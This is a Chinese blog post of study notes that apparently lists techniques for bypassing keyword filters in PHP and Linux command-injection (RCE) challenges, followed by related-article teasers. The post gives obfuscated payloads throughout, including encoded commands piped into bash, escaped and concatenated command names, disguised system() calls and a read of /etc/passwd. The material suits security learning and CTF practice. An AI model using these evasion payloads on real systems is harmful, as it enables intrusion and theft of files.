RCE绕过之关键词绕过

最新推荐文章于 2025-03-30 00:47:44 发布
最新推荐文章于 2025-03-30 00:47:44 发布
阅读量1.7k 收藏 23
点赞数 2
分类专栏: RCE 文章标签: web 网络安全 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/119031475
版权

过滤cat,flag等关键词

①代替
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,可以查看
vim:一种编辑器,可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
sh /flag 2>%261  //报错出文件内容
②使用转义符
ca\t /fl\ag
cat fl''ag
③内联执行绕过

拼接flag

a=fl;b=ag.php;cat$IFS$a$b

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

④变量绕过
a=c;b=a;c=t;$a$b$c 1.txt

在这里插入图片描述
在这里插入图片描述

⑤编码进制绕过
base64

Y2F0IDEudHh0 为 cat 1.txt的base64编码

echo "Y2F0IDEudHh0"|base64 -d|bash

在这里插入图片描述

16进制

0x636174202E2F312E747874 为 cat 1.txt的十六进制编码

echo "0x636174202E2F312E747874"|xxd -r -p|bash

在这里插入图片描述

\x63\x61\x74\x20\x2E\x2F\x31\x2E\x74\x78\x74 为 cat 1.txt的十六进制编码

$(printf "\x63\x61\x74\x20\x2E\x2F\x31\x2E\x74\x78\x74")

在这里插入图片描述

⑥过滤文件名绕过

在这里插入图片描述

1) 利用正则匹配绕过

例如:过滤/1010/flag.php文件

cat 1010/flag.php
cat ????/fla*

2)利用未初始化变量,使用$u绕过

例如过滤/1010/flag.pgp中的1010

cat 1010/flag.php
cat 1010$u/flag.php

在这里插入图片描述

⑦命令执行函数system()绕过

system(“whoami”)

1)十六进制绕过

“\x73\x79\x73\x74\x65\x6d”(“whoami”);

2)括号绕过

(sy.(st).em)(whoami);

3)使用内敛执行代替system
echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);
⑧使用 ∗ 和 *和 @, x , x, x,{数字}

注:因为在没有传参的情况下,上面的特殊变量都是为空的

ca$*t 1010/flag.php
ca$@t 1010/flag.php
ca$2t 1010/flag.php
ca${39}t 1010/flag.php

在这里插入图片描述

⑨其他读取文件方式
curl file:///root/1010/flag.php
strings 1010/flag.php
uniq -c 1010/flag.php
bash -v 1010/flag.php
rev 1010/flag.php

在这里插入图片描述

dir与ls的代替

find 列出当前目录下的文件以及子目录所有文件
在这里插入图片描述
返回主页

RCE远程命令/代码执行漏洞及绕过
G3et的博客
01-01 1166
(1)RCE主要是执行了危险的函数(3)常见的绕过:空格过滤、命令分隔符、编码绕过、Hex编码绕过、Oct编码绕过、变量绕过、反斜杠绕过、偶读拼接绕过关键字过滤等 (4)熟悉掌握php中远程命令/代码执行的相关函数以及绕过和原理参考文档:远程命令/代码执行漏洞(RCE)总结RCE远程命令执行绕过初学RCE(远程命令/代码执行漏洞)
WAF 规则绕过绕过终极指南:从 SQL 注入到高级编码技术(3.21 更新)
浩策盾悟
01-27 1万+
测试最新版本的WAF可以完美绕过。这个需要mysql版本大于5.00.00。/*|%23--%23|*/ 注释符号 *|%23--%23|* 干扰符号。在mysql中这个不是注释,而是取消注释的内容。这个方法也可以部分绕过最新版本的WAF。/包含关键词进行绕过。用一些特殊字符代替空格,特殊字符拼接绕过waf。Mysql 内置得方法。Waf触发规则的绕过
RCE漏洞之绕过
h0ld1rs的博客
10-27 6279
文章目录花括号斜杠空格过滤一些命令分隔符黑名单绕过拼接绕过编码绕过单引号和双引号绕过利用Shell 特殊变量绕过linux中直接查看文件内容的工具文件构造 花括号 {} 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag} 斜杠 路径 / \是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。 也就意味着,我们可以在rce漏洞,过滤掉cat ls等命令时候,直接使用ca\t来实现绕过 空格过滤 < 、<>、%20(spac
WEB安全--RCE--RCE绕过
m0_74800552的博客
03-30 1164
回调函数(Callback Function)指的是将或作为参数传递给另一个函数,从而在特定条件下调用该函数。
RCE通配符绕过
m0_56059226的博客
08-27 1062
RCE的时候除了异或取反等方法,才学了一种新的绕过姿势,就是通配符 在这之前可以先看看什么是通配符Linux通配符的使用_Linux教程_Linux公社-Linux系统门户网站 (linuxidc.com) 谈谈CTF中常见情况吧,当字母数字或者一些特殊的字符被过滤掉时,不能直接传入,就可以考虑用通配符进行绕过,先看一张图片 ?代表的是匹配一个字符,这样的话他就会匹配所有成立情况对/home/kali/ex11进行操作,自然也包括了/bin/cat /home/kali/ex11,因为cat等一.
总结rce(远程代码执行各种sao姿势)绕过bypass
A10ng_的博客
07-17 1万+
空格绕过: 在bash下可以用$IFS、${IFS}、$IFS$9、%09、<、>、<>、{,}(例如{cat,/etc/passwd} )、%20(space)、%09(tab),这儿跟sql注入有点相似,用/**/注释也能绕过。 命令执行函数system()绕过(在URL请求中过滤system()函数) 系统命令函数system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反..
无参数RCE绕过
东隅的博客
02-23 3310
RCE无参数绕过: localeconv()函数返回的是一个数组,其中第一个元素是一个‘ . ’,呢就可以进行一些操作,比如scandir(.)查看当前目录文件,那么他是要配合current()函数的(current()函数返回当前数组的第一个单元)如图示: 那么可能会读出: 然后就是想办法去读取flag.php 1>>利用array_flip()函数,作用是调换数组的键和值,那么flag.php就会变成键,然后用array_rand()函数随机...
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 918
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
rce绕过关键字
最新发布
04-03
总结下来,RCE绕过的方法可能包括:命令注入绕过过滤、利用编码或混淆、认证/授权绕过、框架漏洞利用、上下文敏感攻击(如模板注入)、以及利用信任机制漏洞。 需要确保回答结构清晰,分点说明,每个技术点给出例子...
sql注入绕过+rce
qq_64951792的博客
08-12 1396
RCE基础、SQL注入绕过
RCE绕过的简介以及常见的绕过方式(个人学习笔记)
2302_80935968的博客
03-28 1364
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
RCE(远程命令执行)绕过总结
Elite的博客
04-18 5435
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 1万+
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 1万+
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 2万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 5907
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
无参数RCE绕过之禁止套娃
qq_58970968的博客
07-10 562
知识点:无参数REC 一般有三种绕过姿势:参考文章:无参数RCE总结_L1am0ur的博客-CSDN博客_无参数rce 1.概念: 无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。 没有参数的函数什么意思?一般该类题目代码如下(或类似): 有三种绕过:这里主要讲session_id(),具体其他方法参考原文章;参考文章绝优秀,思路清晰,知识全面;session_id必须要开启session才可以使用,所以我们要先使用session_start所以组合起来就是:session_id(sessi
(RCE)命令执行和代码执行的原理、危害、防范、绕过
m0_52556798的博客
03-19 3006
RCE包括系统命令执行和代码执行,照这样下去owasp top10 快总结完了! rce原理讲讲? 远程系统命令执行 是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交能执行的命令,从而让后台进行执行,从而控制整个后台服务器。 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值